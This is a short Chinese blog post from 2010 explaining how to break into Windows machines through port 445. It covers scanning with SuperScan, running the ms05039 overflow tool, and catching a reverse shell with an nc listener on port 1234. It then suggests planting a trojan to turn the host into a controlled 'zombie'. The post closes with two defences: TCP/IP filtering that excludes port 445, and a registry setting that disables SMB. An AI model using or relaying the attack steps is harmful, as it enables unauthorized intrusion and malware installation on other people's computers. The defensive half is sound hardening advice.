445端口入侵

swolook 2010-04-19

展開全文

第一步，我們需要做的是確定一臺(tái)存在445端口漏洞的主機(jī)?？梢杂脪呙韫ぞ邟呙璧玫?！比如SUPERSCAN這個(gè)端口掃描工具。
第二步，假設(shè)現(xiàn)在我們已經(jīng)得到一臺(tái)存在445端口漏洞的主機(jī)，那么我們就可以利用瑞士軍刀nc和溢出工具ms05039進(jìn)行攻擊：
F:?>ms05039 目標(biāo)IP 本地IP 1234
。。。。。。
。。。。。。
F:?>nc.exe -vv -l -p 1234
。。。。。。
。。。。。。
成功的話，就會(huì)返回一個(gè)shell，然后就可以用我們常用的命令了。比如讓他去下載我們的木馬或上傳一個(gè)木馬給他，然后運(yùn)行，這樣得到一只肉雞的CDMSHELL了。
防范：
方法一：打開Windows 2000系統(tǒng)的開始菜單，選中“設(shè)置”項(xiàng)下面的“網(wǎng)絡(luò)和撥號(hào)連接”圖標(biāo)，并用鼠標(biāo)右鍵單擊之，從其后的快捷菜單中，單擊“瀏覽”命令；
在接著出現(xiàn)的窗口中，右擊“Internet連接”圖標(biāo)，選中“屬性”選項(xiàng)，彈出Internet連接屬性窗口；
打開“常規(guī)”標(biāo)簽頁(yè)面，將其中的“Internet協(xié)議(TCP/IP)”項(xiàng)選中，然后再單擊一下“屬性”按鈕，打開Internet協(xié)議(TCP/IP)屬性設(shè)置頁(yè)面；
繼續(xù)單擊該頁(yè)面中的“高級(jí)”按鈕，打開高級(jí)TCP/IP設(shè)置窗口，選中其中的“選項(xiàng)”標(biāo)簽，并在該標(biāo)簽頁(yè)面的“可選的設(shè)置”項(xiàng)中，將“TCP/IP篩選”選中，再單擊一下對(duì)應(yīng)的“屬性”按鈕，打開TCP/IP篩選的設(shè)置口；
由于445端口屬于一種TCP端口，你可以在對(duì)應(yīng)“TCP端口”的設(shè)置項(xiàng)處，將“只允許”項(xiàng)選中，激活下面的“添加”按鈕，單擊該按鈕，在其后打開的“添加篩選器”窗口中，將必須用到的幾個(gè)服務(wù)端口號(hào)碼，都添加進(jìn)來(lái)，而將用不到的445端口號(hào)碼排除在外，設(shè)置完畢后，單擊“確定”按鈕，就可以讓設(shè)置生效了。
方法二：
開始運(yùn)行里輸入regedit確定
找到HKEY_LOCAL_MACHINESystemCurrentControlSetServicesNetBTParameters
在右面的窗口右鍵建立一個(gè)名為SMBDeviceEnabled 類型為REG_DWORD鍵值為 0這樣就ok了

本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間，所有內(nèi)容均由用戶發(fā)布，不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購(gòu)買等信息，謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請(qǐng)點(diǎn)擊一鍵舉報(bào)。

轉(zhuǎn)藏 分享

QQ空間 QQ好友新浪微博微信

獻(xiàn)花（0） +1

來(lái)自： swolook > 《電腦安全》

舉報(bào)/認(rèn)領(lǐng)